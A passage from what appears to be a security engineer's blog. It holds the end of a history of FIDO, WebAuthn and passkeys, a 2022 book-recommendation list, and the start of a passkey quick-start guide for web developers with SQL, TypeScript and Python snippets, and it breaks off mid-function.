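        # Creating a credential for an existing pair replaces the old one.
        self._creds[(site, user_id)] = {
            "user_id": user_id,
            "username": username,
            "display_name": display_name,
            "credential_id": credential_id,
        }

    def discover(self, site: str) -> list[dict]:
        """List the credentials for a site so the user can pick an account."""
        return [c for (s, _), c in self._creds.items() if s == site]
```

This is why a website should use a stable, per-account user ID: reusing one for a different account would silently replace that account’s credential on the same security key.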

Storing all this takes space on the security key, of course. And, if your security key needs to be able to run within the tight power budget of an NFC device, space might be limited. Also, the interface to manage discoverable credentials didn’t make it into CTAP 2.0 and had to wait for CTAP 2.1, so some early CTAP2 security keys only let you erase discoverable credentials by resetting the whole key!

User verification

You probably don’t want somebody to be able to find your lost security key and sign in as you. So, to replace passwords, security keys are going to have to verify that the correct user is present, not just that any user is present.

So, FIDO2 has an upgraded form of user presence called “user verification”. Different security keys can verify users in different ways. The most basic method is a PIN entered on the computer and sent to the security key. The PIN doesn’t have to be numeric—it can include letters and other symbols too—one might even call it a password if the aim of FIDO wasn’t to replace passwords. But, whatever you call it, it is stronger than typical password authentication because the secret is only sent to the security key, so it can’t leak from some far away password database, and the security key can enforce a limited number of attempts to guess it.

Some security keys do user verification in other ways. They can incorporate a fingerprint reader, or they can have an integrated PIN pad for more secure PIN entry.

RP IDs

FIDO2 replaces AppIDs with “relying party IDs” (RP IDs). AppIDs were URLs, but RP IDs are bare domain names. But otherwise, RP IDs serve the same purpose as AppIDs did in CTAP1.

We only briefly covered the rules for which websites can set which AppIDs before because AppIDs are obsolete, but it’s worth covering the rules for RP IDs in detail because of how important they are in deployments.

A site may use any RP ID formed by discarding zero or more labels from the left of its domain name until it hits an eTLD. So say that you’re https://www.foo.co.uk: you can specify an RP ID of www.foo.co.uk (discarding zero labels), foo.co.uk (discarding one label), but not co.uk because that’s an eTLD. If you don’t set an RP ID in a request then the default is the site’s full domain.
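The rule can be sketched in a few lines. This is an illustration under loud assumptions: `ETLDS` is a tiny, hypothetical stand-in for the real public suffix list (which also has wildcard and exception rules that are ignored here), and `allowedRpIds` is a made-up helper rather than anything a browser exposes.

```typescript
// Hypothetical stand-in for the public suffix list. Real code needs the
// full list, including its wildcard and exception rules.
const ETLDS = new Set(["com", "uk", "co.uk"]);

// Returns the RP IDs that a page served from `host` may use: the host
// itself, then each parent domain, stopping before an eTLD is reached.
function allowedRpIds(host: string): string[] {
  const labels = host.toLowerCase().split(".");
  const result: string[] = [];
  for (let i = 0; i < labels.length; i++) {
    const candidate = labels.slice(i).join(".");
    if (ETLDS.has(candidate)) {
      break;
    }
    result.push(candidate);
  }
  return result;
}
```

For `www.foo.co.uk` this yields `www.foo.co.uk` and `foo.co.uk`, matching the example above.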

Our www.foo.co.uk example might happily be creating credentials with its default RP ID but later decide that it wants to move all sign-in activity to an isolated origin, https://accounts.foo.co.uk. But none of the passkeys could be used from that origin! The site would have needed to create them with an RP ID of foo.co.uk from the beginning to allow that.

So it’s important to carefully consider your RP ID from the outset. But the rule is not to always use the most general RP ID possible. Going back to our example, if usercontent.foo.co.uk existed, then any credentials with an RP ID of foo.co.uk could be overwritten by pages on usercontent.foo.co.uk. We can assume that foo.co.uk is checking the origin of any assertions, so usercontent.foo.co.uk can’t use its ability to set an RP ID of foo.co.uk to generate valid assertions, but it can still try to get the user to create new credentials which could overwrite the legitimate ones.

CTAP protocol changes

In addition to the high-level semantic changes outlined above, the syntax of CTAP2 is thoroughly different from that of U2F. Rather than being a binary protocol with fixed or ad-hoc field lengths, it uses CBOR. CBOR, when reasonably subset, is a MessagePack-like encoding that can represent the JSON data model in a compact binary format, but it also supports a bytestring type to avoid having to base64-encode binary values.
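To make the encoding a little more concrete, here is a minimal sketch of a CBOR encoder that handles only the types that CTAP2 messages commonly use: small integers, booleans, text, byte strings, arrays, and maps. It is an illustration and not a usable CTAP2 implementation. The `Cbor` type and the `cborHead` and `encodeCbor` functions are names made up for this sketch, integers are assumed to have a magnitude below 2^32, and it doesn't enforce the canonical ordering of map keys that CTAP2 expects.

```typescript
// Hypothetical names throughout; this is a sketch, not a CTAP2 library.
type Cbor =
  | number // integers only, magnitude below 2^32
  | boolean
  | string
  | Uint8Array
  | Cbor[]
  | Map<number | string, Cbor>;

// Encodes a major type (0 to 7) and its argument as a CBOR "head".
function cborHead(major: number, n: number): number[] {
  const m = major << 5;
  if (n < 24) return [m | n];
  if (n < 0x100) return [m | 24, n];
  if (n < 0x10000) return [m | 25, n >> 8, n & 0xff];
  return [m | 26, (n >>> 24) & 0xff, (n >>> 16) & 0xff, (n >>> 8) & 0xff, n & 0xff];
}

function encodeCbor(v: Cbor): number[] {
  if (typeof v === "number") {
    // Major type 0 is an unsigned integer; major type 1 holds -1 - n.
    return v >= 0 ? cborHead(0, v) : cborHead(1, -1 - v);
  }
  if (typeof v === "boolean") return [v ? 0xf5 : 0xf4];
  if (typeof v === "string") {
    const utf8 = Array.from(new TextEncoder().encode(v));
    return cborHead(3, utf8.length).concat(utf8);
  }
  if (v instanceof Uint8Array) {
    // Byte strings are carried as-is, so there is no need for base64.
    return cborHead(2, v.length).concat(Array.from(v));
  }
  if (Array.isArray(v)) {
    return v.reduce<number[]>(
      (out, item) => out.concat(encodeCbor(item)), cborHead(4, v.length));
  }
  let out = cborHead(5, v.size);
  v.forEach((value, key) => {
    out = out.concat(encodeCbor(key), encodeCbor(value));
  });
  return out;
}
```

Encoding a one-entry map from the integer 1 to the string "webauthn.io" takes 14 bytes: one for the map header, one for the key, one for the string header, and eleven for the string itself.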

CTAP2 replaces the polling-based model of U2F with one where a security key would wait to process a request until it was able. It also tried to create a model where the entire request would be sent by the platform in a single message, rather than having the platform iterate through credential IDs to find ones that a security key recognised. However, due to limited buffer sizes of security keys, this did not work out: the messages could end up too large, especially when dealing with large lists of credential IDs, so many requests will still involve multiple round trips between the computer and the security key to process.

While I’m not going to cover CTAP2 in any detail, let’s have a look at a couple of examples. Here’s a credential creation request:

{
  # SHA-256 hash of client data
  1: h'60EACC608F20422888C8E363FE35C9544A58B8920989D060021BC30F7323A423',
  # RP ID and friendly name of website
  2: {
    "id": "webauthn.io",
    "name": "webauthn.io"
  },
  3: {
    # User ID
    "id": h'526E4A6C5A41',
    # Username
    "name": "Fred",
    # User Display Name
    "displayName": "Fred"
  },
  4: [
    # ECDSA with P-256 is acceptable to the website
    {"alg": -7, "type": "public-key"},
    # And so is RSA.
    {"alg": -257, "type": "public-key"}
  ],
  # Create a discoverable credential.
  7: {"rk": true},
  # A MAC showing that the user has entered the correct PIN and thus
  # that this request has verified the user, using "PIN protocol" v1.
  8: h'4153542771C1BF6586718BCD0ECA8E96', 9: 1
}

CBOR is a binary format, but it defines a diagnostic notation for debugging, and that’s how we’ll present CBOR messages here. If you scan down the fields in the message, you’ll see similarities and differences with U2F:

Likewise, here’s an assertion request:

{
  # RP ID of the requesting website.
  1: "webauthn.io",
  # Hash of the client data
  2: h'E7870DBBA212581A536D29D38831B2B8192076BAAEC76A4B34918B4222B79616',
  # List of credential IDs
  3: [
    {"id": h'D64875A5A7C642667745245E118FCD6A', "type": "public-key"}
  ],
  # A MAC showing that the user has entered the correct PIN and thus
  # that this request has verified the user, using "PIN protocol" v1.
  6: h'6459AF24BBDA323231CF42AECABA51CF', 7: 1
}

Again, it’s structurally similar to the U2F request, except that the list of credential IDs is included in the request rather than having the computer poll for each in turn. Since the credential that we created was discoverable, critically that list could also be empty and the request would still work! That’s why discoverable credentials can be used before a username has been entered.

With management of discoverable credentials, fingerprint enrollment, enterprise attestation support, and more, CTAP2 is quite complex. But it’s a very capable authentication ecosystem for enterprises and experts.

WebAuthn

As part of the FIDO2 effort, the U2F web API was completely replaced. If you recall, the U2F web API was not a W3C standard, and it was only ever implemented in Chromium as a hidden extension. The replacement, called WebAuthn, is a real W3C spec and is now implemented in all browsers.

It is substantially more complicated than the old API!

WebAuthn is integrated into the W3C credential management specification and so it is invoked in JavaScript via navigator.credentials.create and navigator.credentials.get. This document is about understanding the deeper structures that underpin WebAuthn rather than being a guide to its details. So we’ll leave them to the numerous tutorials that already exist on the web and instead focus on how structures from U2F were carried over into WebAuthn and updated.

Firstly, we’ll look at the structure of a signed assertion in WebAuthn.

Offset Size Meaning
0 32 SHA-256 hash of the RP ID
32 1 Flags
33 4 Signature counter
37 varies CBOR-encoded extension outputs
varies 32 SHA-256 hash of the client data

It should look familiar because it’s a superset of the CTAP1 (U2F) signed message format. This was chosen deliberately so that U2F security keys would function with WebAuthn. This wasn’t a given (there were discussions about whether it should be a fresh start), but ultimately there were lots of perfectly functional U2F security keys out in the world, and it seemed too much of a shame to leave them behind.

But there are changes in the details. Firstly, what was the AppID hash is now the RP ID hash. We discussed RP IDs above and, importantly, the space of AppIDs and the space of RP IDs are distinct. So since U2F security keys compare the hashes of these strings, no credential registered with the old U2F API could function with WebAuthn. From the security keys’ perspective, the hash is incorrect and so the credential can’t be used. Some complicated workarounds were needed for this, which we will touch on later.

The other changes in the assertion format come from defining additional flag bits and adding an extensions block. The most important new flag bit is the one that indicates that user verification was performed in an assertion. (WebAuthn and CTAP2 were co-developed, and so the new concept of user verification from the latter was exposed in the former.)
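As a sketch of how a backend might pick apart the fixed-size start of this structure, the following reads the RP ID hash, the flags, and the signature counter. The bit positions are the ones that WebAuthn defines (0x01 for user presence, 0x04 for user verification, 0x80 for the presence of extension data), but `parseAuthenticatorData` and the `ParsedAuthData` shape are names invented here, and a real implementation would go on to check the RP ID hash and the signature.

```typescript
// Hypothetical result shape for this sketch.
interface ParsedAuthData {
  rpIdHash: Uint8Array;
  userPresent: boolean;
  userVerified: boolean;
  hasExtensions: boolean;
  signCount: number;
}

// Parses the first 37 bytes of the signed message: a 32-byte hash, a flags
// byte, and a 4-byte, big-endian signature counter.
function parseAuthenticatorData(data: Uint8Array): ParsedAuthData {
  if (data.length < 37) {
    throw new Error("authenticator data too short");
  }
  const flags = data[32];
  const view = new DataView(data.buffer, data.byteOffset, data.byteLength);
  return {
    rpIdHash: data.slice(0, 32),
    userPresent: (flags & 0x01) !== 0,
    userVerified: (flags & 0x04) !== 0,
    hasExtensions: (flags & 0x80) !== 0,
    signCount: view.getUint32(33, false), // false selects big-endian
  };
}
```

A website that wants to use a credential in place of a password would reject any assertion where `userVerified` is false.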

The extensions block was added to make the assertion format more flexible. While U2F’s binary format was pleasantly simple, it was difficult to change. Since CTAP2 was embracing CBOR throughout, it made sense that security keys be able to return any future fields that needed to be added to the assertion in CBOR format.

Correspondingly, an extension block was added into the WebAuthn requests too (although those are JavaScript objects rather than CBOR). The initial intent was that browsers would transcode extensions into CBOR, send them to the authenticator, and the authenticator could return the result in its output. However, exposing arbitrary and unknown functionality from whatever USB devices were plugged into the computer to the open web was too much for browsers, and no browser ever allowed arbitrary extensions to be passed through like that. Nonetheless, several important pieces of functionality have been implemented via extensions in the subsequent years.

The first major extension was a workaround for the transition to RP IDs mentioned above. The appid extension to WebAuthn allowed a website to assert a U2F AppID when requesting an assertion, so that credentials registered with the old U2F API could still be used. Similarly, the appidExclude extension could specify an AppID in a WebAuthn registration request so that a security key registered under the old API couldn’t be accidentally registered twice.
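In request terms, using the appid extension looks roughly like the following sketch. The domain, the AppID URL, and the `legacyAssertionOptions` helper are all placeholders invented for illustration; the resulting object is what would be passed to navigator.credentials.get.

```typescript
// Builds assertion options for a site whose older credentials were
// registered through the U2F API. The RP ID and AppID are placeholders.
function legacyAssertionOptions(challenge: Uint8Array, credentialIds: Uint8Array[]) {
  return {
    publicKey: {
      challenge,
      rpId: "example.com",
      allowCredentials: credentialIds.map(id => ({
        type: "public-key" as const,
        id,
      })),
      // Lets credentials that were registered under this U2F AppID be used.
      extensions: { appid: "https://example.com/u2f-appid.json" },
    },
  };
}
```

After a successful call, `getClientExtensionResults().appid` on the returned credential is true if the AppID was used, in which case the hash at the start of the signed message is the hash of the AppID rather than of the RP ID, and the backend has to expect that.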

Overall, the transition to RP IDs probably wasn’t worth it, but we’ve done it now so it’s only a question of learning for the future.

Extensions in the signed response allow the authenticator to add extra data into the response, but the last field in the signed message, the client data hash, is carried over directly from U2F and remains the way that the browser/platform adds extra data. It gained some more fields in WebAuthn:

dictionary CollectedClientData {
    required DOMString           type;
    required DOMString           challenge;
    required DOMString           origin;
    DOMString                    topOrigin;
    boolean                      crossOrigin;
};

The centrally-important origin and challenge are still there, and type for domain separation, but the modern web is complex and often involves layers of iframes and so some more fields have been added to ensure that backends have a clear and correct picture of where the purported sign-in is happening.
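A backend's checks on the client data might look something like this sketch. It assumes that the backend has already confirmed that the signature covers the hash of this exact JSON, and that it remembers the challenge that it issued in base64url form (which is how the challenge appears in the client data). `checkClientData` and its parameter shape are invented for illustration.

```typescript
interface ClientData {
  type: string;
  challenge: string; // base64url-encoded
  origin: string;
  topOrigin?: string;
  crossOrigin?: boolean;
}

// Hypothetical helper: throws unless the client data is what this backend
// expects, and otherwise returns the parsed structure.
function checkClientData(
  clientDataJSON: string,
  expected: {
    type: "webauthn.create" | "webauthn.get";
    challenge: string;
    origins: string[];
  },
): ClientData {
  const cd = JSON.parse(clientDataJSON) as ClientData;
  if (cd.type !== expected.type) {
    throw new Error("unexpected type: " + cd.type);
  }
  if (cd.challenge !== expected.challenge) {
    throw new Error("challenge mismatch");
  }
  if (expected.origins.indexOf(cd.origin) === -1) {
    throw new Error("unexpected origin: " + cd.origin);
  }
  // This sketch assumes that the site never signs in from inside a
  // cross-origin iframe, so it rejects such requests outright.
  if (cd.crossOrigin === true) {
    throw new Error("unexpected cross-origin request");
  }
  return cd;
}
```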

Other types of authenticator

Until now, we have been dealing only with security keys as authenticators. But WebAuthn does not require that all authenticators be security keys. Although aspects of CTAP2 poke through in the WebAuthn data structures, anything that formats messages correctly can be an authenticator, and so laptops and desktops themselves can be authenticators.

These devices are known as “platform authenticators”. At this point in our evolution, they are aimed at a different use case than security keys. Security keys are called “cross-platform authenticators” because they can be moved between devices, and so they can be used to authenticate on a brand-new device. A platform authenticator is for when you need to re-authenticate a user, that is, to establish that the correct human is still behind the keyboard. Since we want to validate a specific human, platform authenticators must support user verification to be useful for this.

And so there is a specific feature detection function called isUserVerifyingPlatformAuthenticatorAvailable (usually shortened to “isUVPAA” for obvious reasons). Any website can call this and it will return true if there is a platform authenticator on the current device that can do user verification.

The majority of WebAuthn credentials are created on platform authenticators now because they’re so readily available and easy to use.

caBLE / hybrid

While platform authenticators were great for reauthenticating on the same computer, they could never work for signing in on a different computer. And the set of people who were going to go out and buy security keys was always going to be rather small. So, to broaden the reach of WebAuthn, allowing people to use their phones as authenticators was an obvious step.

CTAP over BLE was already defined, but Bluetooth pairing was an awkward and error-prone process. Could we make phones usable as authenticators without it?

The first attempt was called cloud-assisted BLE (caBLE) and it involved the website and the phone having a shared key. A WebAuthn extension allowed the website to request that a computer start broadcasting a byte string over BLE. The idea was that the phone would be listening for these BLE adverts, would trial decrypt their contents against the set of shared keys it knew about, and (if it found a match) it would start advertising in response. When the computer saw a matching reply, it would make a Generic Attribute Profile (GATT) connection to that phone, do encryption at the application level, and then CTAP could continue as normal, all without having to do Bluetooth pairing.

This was launched as a feature specific to accounts.google.com and Chrome. For several years you could enable “Phone as a Security Key” for your Google account and it did something like that. But, despite a bunch of effort, there were persistent problems:

Firstly, listening for Bluetooth adverts in the background was difficult in the Android ecosystem. To work around this, accounts.google.com would send a notification to the phone over the network to tell it when to start listening. This was fine for accounts.google.com, but most websites can’t do that.

Secondly, the quality of Bluetooth hardware in desktops varies considerably, and getting a desktop to send more than one BLE advert never worked well. So you could only have one phone enrolled for this service, per account.

Lastly, but most critically, BLE GATT connections were just too unreliable. Even after a considerable amount of work to try and debug issues, the most reliable combination of phone and desktop achieved only 95% connection success—and that’s after the two devices had managed to exchange BLE adverts. In common configurations, the success rate was closer to 80% and it would randomly fail even for the people developing it. So despite trying for years to make this design work, it had to be abandoned.

The next attempt was called caBLEv2. Given all the issues with BLE in the previous iteration, caBLEv2 was designed to use the least amount of Bluetooth possible: a single advert sent from the phone to the desktop. This means that the rest of the communication went over the internet, which requires that both phone and desktop have an internet connection. This is unfortunate, but there were no other viable options. Using Bluetooth Classic presents a host of problems, and BLE L2CAP does not work from user space on Windows.

Still, using Bluetooth somewhere in the protocol is critical because it proves proximity between the two devices. If all communication was done over the Internet, then the phone has no proof that the computer it is sending the assertion to is nearby. It could be an attacker’s computer on the other side of the world. But if we can send one Bluetooth message from the phone and make the computer prove that it has received it, then all other communication can be routed over the Internet. And that is what caBLEv2 does.

It also changed the relationship between the parties. While caBLEv1 required that a key be shared between the website and the phone, caBLEv2 was a relationship between a computer and a phone. This made some user flows less smooth, but it made it much easier for smaller websites to take advantage of the capability.

In practice, caBLEv2 has worked far better, although Bluetooth problems still occur. (And not every desktop has Bluetooth.)

A caBLEv2 transaction is often triggered by a browser showing a QR code. That QR code contains a public key for the browser and a shared secret. When a phone scans it, it starts sending a BLE advert that is encrypted with the shared secret and which contains a nonce and the location of an internet server that communication can be routed through. The desktop decrypts this advert, connects to that server (which forwards messages to the phone and back), and starts a cryptographic handshake to prove that it holds the keys from the QR code and that it received the BLE advert. Once that communication channel is established, CTAP2 is run over it so that the phone can be used as an authenticator.

caBLEv2 also allows the phone to send information to the desktop that allows the desktop to contact it in the future without scanning a QR code. This depends on that same internet service, which must be able to send a notification to the phone, rather than constant BLE listening. (Although a BLE advert is sent for every transaction to prove proximity.) 

But ultimately, while the name caBLE was cute, it was also confusing. And so FIDO renamed it to “hybrid” when it was included in CTAP 2.2. So you’ll now see this called “hybrid CTAP” and the transport name in WebAuthn is hybrid.

The WebAuthn-family of APIs

WebAuthn is a web API, but people also use their computers and phones outside of a web browser sometimes. So while these contexts can’t use WebAuthn itself, a number of APIs for native apps that are similar to WebAuthn have popped up. These APIs aren’t WebAuthn, but if they produce signed messages in the same format as WebAuthn, a backend server needn’t know the difference. It’s a term that I’ve made up, but I call them “WebAuthn-family” APIs.

On Windows, webauthn.dll is a system service that reproduces most of WebAuthn for apps. (Browsers on Windows use this to implement WebAuthn, so it has to be pretty complete.) On iOS and macOS, Authentication Services does much the same. On Android, Credential Manager allows apps to pass in JSON-encoded WebAuthn requests and get JSON responses back. WebAuthn Level Three also includes support for the same JSON encoding so that backends should seamlessly be able to handle sign-ins from the web and Android apps. (WebAuthn should never have used ArrayBuffers.)
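As I understand it, the JSON encoding carries binary fields as unpadded base64url strings, so a backend that handles both forms mostly needs a pair of conversion helpers. The following is a sketch; `toBase64Url` and `fromBase64Url` are names made up here.

```typescript
// Encodes bytes as base64url without padding.
function toBase64Url(bytes: Uint8Array): string {
  let binary = "";
  bytes.forEach(b => {
    binary += String.fromCharCode(b);
  });
  return btoa(binary)
    .replace(/\+/g, "-")
    .replace(/\//g, "_")
    .replace(/=+$/, "");
}

// Decodes base64url, with or without padding.
function fromBase64Url(text: string): Uint8Array {
  const unpadded = text.replace(/=+$/, "");
  const base64 = unpadded.replace(/-/g, "+").replace(/_/g, "/") +
    "=".repeat((4 - (unpadded.length % 4)) % 4);
  return Uint8Array.from(atob(base64), c => c.charCodeAt(0));
}
```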

Passkeys

With hybrid and platform authenticators, people had lots of access to WebAuthn authenticators. But if you reset or lost your phone/laptop you still lost all of your credentials, same as if you reset or lost a security key. In an enterprise situation, losing a security key is resolved by going to the helpdesk. In a personal context, the advice had long been to register at least two security keys and to keep one of them locked away in a safe. But it’s awfully inconvenient to register a security key everywhere when it’s locked in a safe. So while this advice worked for protecting a tiny number of high-value accounts, if WebAuthn credentials were ever going to make a serious dent in the regular authentication ecosystem, they had to do better.

“Better” has to mean “recoverable”. People do lose and reset their phones, and so a heretofore sacred property of FIDO would have to be relaxed so that it could expand its scope beyond enterprises and experts: private keys would have to be backed up.

In 2021, with iOS 15, Apple included the ability to save WebAuthn private keys into iCloud Keychain, and Android Play Services got support for hybrid. At the end of 2022, iOS 16 added support for hybrid and, on Android, Google Password Manager added support for backing up and syncing private keys.

People now had common access to authenticators, the ability to assert credentials across devices with them, and fair assurance that they could recover those credentials. To bundle that together and give it a more friendly name, Apple introduced better branding: passkeys.

With passkeys, the world now has a widely available authentication mechanism that isn’t subject to phishing, isn’t subject to password reuse nor credential stuffing, can’t be sniffed and replayed by malicious 3rd-party JavaScript on the website, and doesn’t cause a mess when the server-side password database leaks.

There is some ambiguity about the definition of passkeys. Passkeys are synced, discoverable WebAuthn credentials. But we don’t want to exclude people who really want to use a security key, so if you would like to create a credential on a security key, we assume you know what you’re doing and the UI will refer to them as passkeys even though they aren’t synced. Also, we’re still building the ecosystem of syncing, which is quite fragmented presently: Windows Hello doesn’t sync at all, Google Password Manager can only sync between Android devices, and iCloud Keychain only works on Apple devices. So there is a fair chance that if you create a credential that gets called a passkey, it might not actually be backed up anywhere. So the definition is a little bit aspirational for the moment, but we’re working on it.

Another feature that came with the introduction of passkeys was integration into browser autofill. (This is also called “conditional UI” because of the name of a value in the W3C credential management spec.) So websites can now opt to have passkeys listed in autofill, as passwords are. This is not a long-term design! It would be weird if in 20 years websites had to have a pair of text boxes on their front page for signing in, in the same way that we use an icon of a floppy disk to denote saving. But conditional UI hopefully makes it much easier for websites to adopt passkeys, given that they are starting with a user base that is 100% password users.

If you want to understand how passkey support works on a website, see here. But remember that the core concepts stretch back to U2F: passkeys are still partitioned by an RP ID, they still have credential IDs, and there’s still the client data containing a server-provided challenge.

The future

The initial launch of passkeys didn’t have any provision for third-party password managers. On iOS and macOS, you had to use iCloud Keychain, and on Android you had to use Google Password Manager. That was expedient but never the intended end state, and with iOS 17 and Android 14, third-party password managers can save and provide passkeys.

At the time of writing, in 2023, most of the work is in building out the ecosystem that we have sketched. Passkeys need to sync to more places, and third-party password manager support needs to get fleshed out.

There are a number of topics on the horizon, however. With FIDO2, CTAP, and WebAuthn, we are asking websites to trust password managers a lot more. While password managers have long existed, usage is far from universal. But with FIDO2, by design, users have to use a password manager. We are also suggesting that with passkeys, websites might not need to use a second authentication factor. Two-factor authentication has become commonplace, but that’s because the first factor (the password) was such rubbish. With passkeys, that’s no longer the case. That brings many benefits! But it means that websites are outsourcing their authentication to password managers, and some would like some attestation that they’re doing a good job.

Next, the concept of an RP ID is central to passkeys, but it’s a very web-centric concept. Some services are mobile-only and don’t have a strong brand in the form of a domain name. But passkeys are forever associated with an RP ID, which forces apps to commit to a domain name that might well appear in the UI.

The purpose of the RP ID was to stop credentials from being shared across websites and thus becoming a tracking vector. But now that we have a more elaborate UI, perhaps we could show the user the places where credentials are being used and let the RP ID be a hash of a public key, or something else not tied to DNS.

We also need to think about the problem of users transitioning between ecosystems. People switch from Android to iOS and vice versa, and they should be able to bring their passkeys along with them.

There is a big pile of corpses labeled “tried to replace passwords”. Passkeys are the best attempt so far. Here's hoping that, in five years’ time, they’re not a cautionary tale.

Books, 2022

As Twitter is having a thing (agl@infosec.exchange, by the way) it's nice that RSS is still ticking along. To mark that fact as we reach the end of the year, I decided to write up a list of books that I've read in the past 12 months that feel worthy of recommendation to a general audience.

Flying Blind

Boeing was once a standard-bearer for American engineering and manufacturing abilities and now it's better known for the groundings of the 737 MAX 8 and 787. This is a history of how Boeing bought McDonnell Douglas and found that it contained lethal parasites.

Electrify

Burning things produces CO2 and air pollution. Both slowly hurt people so we should stop doing it where possible. This is a data-filled book on how to get a long way towards that goal, and is an optimistic respite from some of the other books on this list.

The Splendid & The Vile

Do we really need another book about WWII? Perhaps not, but I enjoyed this one which focuses on the members of the Churchill family in the first couple of years of the war.

Transformer

Ignorant as I am about microbiology, I love Nick Lane books because they make me feel otherwise and I cross my fingers that they're actually accurate. This book is avowedly presenting a wild theory—which is probably false—but is a wonderful tour of the landscape either way.

Stuff Matters

A pop-science book, but a good one that focuses on a number of materials in the modern world. If you know anything about the topic, this is probably too light-weight. But if, like me, you know little, it's a fun introduction.

Amusing Ourselves to Death

This is a book from 1985 about the horrors of television. Its arguments carry more force when transposed to the modern internet but are also placed into a larger context because they were made 40 years ago and TV hasn't destroyed civilisation (… probably).

The Story of VaccinateCA

I'm cheating: this isn't a book, although it is quite long. As we collectively fail to deal with several slow crises, here's a tale of what failed and what succeeded in a recent short, sharp crisis. It is very California focused, and less useful to those outside of America, but I feel that it's quite important.

Art of Computer Programming, Satisfiability

This isn't “general audience”, but if you read this far perhaps neither are you. SMT solvers are volatile magic and, while this is only about SAT, it's a great introduction to the area. I would love to say that I read it in the depth that it deserves, but even skimming the text and skipping the exercises is worth a lot.

The Economist also has its books of the year list. I've only read one of them, Slouching Towards Utopia, and it didn't make my list above!

Passkeys

This is an opinionated, “quick-start” guide to using passkeys as a web developer. It’s hopefully broadly applicable, but one size will never fit all authentication needs and this guide ignores everything that’s optional. So take it as a worked example, but not as gospel.

It doesn't use any WebAuthn libraries; it just assumes that you have access to functions for verifying signatures. That mightn't be optimal (maybe finding a good library is a better idea), but passkeys aren't so complex that it's unreasonable for people to know what's going on.

This is probably a post that'll need updating over time, making it a bad fit for a blog, so maybe I'll move it in the future. But it's here for now.

Platforms for developing with passkeys include:

Database changes

Each user will need a passkey user ID. The user ID identifies an account, but should not contain any personally identifiable information (PII). You probably already have a user ID in your system, but you should make one specifically for passkeys to more easily keep it PII-free. Create a new column in your users table and populate it with large random values for this purpose. (The following is in SQLite syntax so you’ll need to adjust for other databases.)

/* SQLite can't set a non-constant DEFAULT when altering a table, only
 * when creating it, but this is what we would like to write. */
ALTER TABLE users ADD COLUMN passkey_id blob DEFAULT(randomblob(16));

/* The CASE expression causes the function to be non-constant. */
UPDATE USERS SET passkey_id=hex(randomblob(CASE rowid WHEN 0
                                                      THEN 16
                                                      ELSE 16 END));
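If you would rather generate the value in application code than in SQL, something like the following would do when creating an account. It's a sketch that assumes a Node.js backend, and `newPasskeyUserId` is an invented helper name. The base64 form is returned as well because the snippets later in this guide expect to receive the ID base64-encoded.

```typescript
import { randomBytes } from "node:crypto";

// Returns a fresh, random, 16-byte passkey user ID, both as raw bytes (for
// storing in the passkey_id column) and base64-encoded (for sending to the
// page).
function newPasskeyUserId(): { raw: Uint8Array; base64: string } {
  const raw = randomBytes(16);
  return { raw, base64: raw.toString("base64") };
}
```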

A user can only have a single password but can have multiple passkeys. So create a table for them:

CREATE TABLE passkeys (
  id BLOB PRIMARY KEY,
  username TEXT NOT NULL,
  public_key_spki BLOB,
  backed_up BOOLEAN,
  FOREIGN KEY(username) REFERENCES users(username));

Secure contexts

Nothing in WebAuthn works outside of a secure context, so if you’re not using HTTPS, go fix that first.

Enrolling existing users

When a user signs in with a password, you might want to prompt them to create a passkey on the local device for easier sign-in next time. First, check to see if their device has a local authenticator and that the browser is going to support passkeys:

if (!window.PublicKeyCredential ||
    !(PublicKeyCredential as any).isConditionalMediationAvailable) {
  return;
}

Promise.all([
    (PublicKeyCredential as any).isConditionalMediationAvailable(),
    PublicKeyCredential
      .isUserVerifyingPlatformAuthenticatorAvailable()])
  .then((values) => {
    if (values.every(x => x === true)) {
      promptUserToCreatePlatformCredential();
    }
  })

(The snippets here are in TypeScript. It should be easy to convert them to plain JavaScript if that’s what you need. You might notice several places where TypeScript’s DOM types are getting overridden because lib.dom.d.ts hasn’t caught up. I hope these cases will disappear in time.)

If the user accepts, ask the browser to create a local credential:

var createOptions : CredentialCreationOptions = {
  publicKey: {
    rp: {
      // The RP ID. This needs some thought. See comments below.
      id: SEE_BELOW,
      // This field is required to be set to something, but you can
      // ignore it.
      name: "",
    },

    user: {
      // `userIdBase64` is the user's passkey ID, from the database,
      // base64-encoded.
      id: Uint8Array.from(atob(userIdBase64), c => c.charCodeAt(0)),
      // `username` is the user's username. Whatever they would type
      // when signing in with a password.
      name: username,
      // `displayName` can be a more human name for the user, or
      // just leave it blank.
      displayName: "",
    },

    // This lists the ids of the user's existing credentials. I.e.
    //   SELECT id FROM passkeys WHERE username = ?
    // and supply the resulting list of values, base64-encoded, as
    // existingCredentialIdsBase64 here.
    excludeCredentials: existingCredentialIdsBase64.map(id => {
      return {
        type: "public-key",
        id: Uint8Array.from(atob(id), c => c.charCodeAt(0)),
      };
    }),

    // Boilerplate that advertises support for P-256 ECDSA and RSA
    // PKCS#1v1.5. Supporting these key types results in universal
    // coverage so far.
    pubKeyCredParams: [{
      type: "public-key",
      alg: -7
    }, {
      type: "public-key",
      alg: -257
    }],

    // Unused during registrations, except in some enterprise
    // deployments. But don't do this during sign-in!
    challenge: new Uint8Array([0]),

    authenticatorSelection: {
      authenticatorAttachment: "platform",
      requireResidentKey: true,
    },

    // Three minutes.
    timeout: 180000,
  }
};

navigator.credentials.create(createOptions).then(
  handleCreation, handleCreationError);

RP IDs

There are two levels of controls that prevent passkeys from being used on the wrong website. You need to know about this upfront to prevent getting stuck later.

“RP” stands for “relying party”. You (the website) are a “relying party” in authentication-speak. An RP ID is a domain name and every passkey has one that’s fixed at creation time. Every passkey operation asserts an RP ID and, if a passkey’s RP ID doesn’t match, then it doesn’t exist for that operation.

This prevents one site from using another’s passkeys. A passkey with an RP ID of foo.com can’t be used on bar.com because bar.com can’t assert an RP ID of foo.com. A site may use any RP ID formed by discarding zero or more labels from the left of its domain name until it hits an eTLD. So say that you’re https://www.foo.co.uk: you can assert www.foo.co.uk (discarding zero labels), foo.co.uk (discarding one label), but not co.uk because that hits an eTLD. If you don’t set an RP ID in a request then the default is the site’s full domain.
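To make the label-discarding rule concrete, here is a minimal Python sketch of it. It is only an illustration: the function name is made up, and the ETLDS set is a tiny, hypothetical stand-in for the real public suffix list that browsers consult.

```python
def allowed_rp_ids(host: str, etlds: set) -> list:
    """Return the RP IDs that `host` may assert, most specific first."""
    labels = host.lower().rstrip(".").split(".")
    allowed = []
    for i in range(len(labels)):
        # Discard `i` labels from the left of the domain name.
        candidate = ".".join(labels[i:])
        if candidate in etlds:
            # Hit an eTLD: this suffix, and anything shorter, is off limits.
            break
        allowed.append(candidate)
    return allowed


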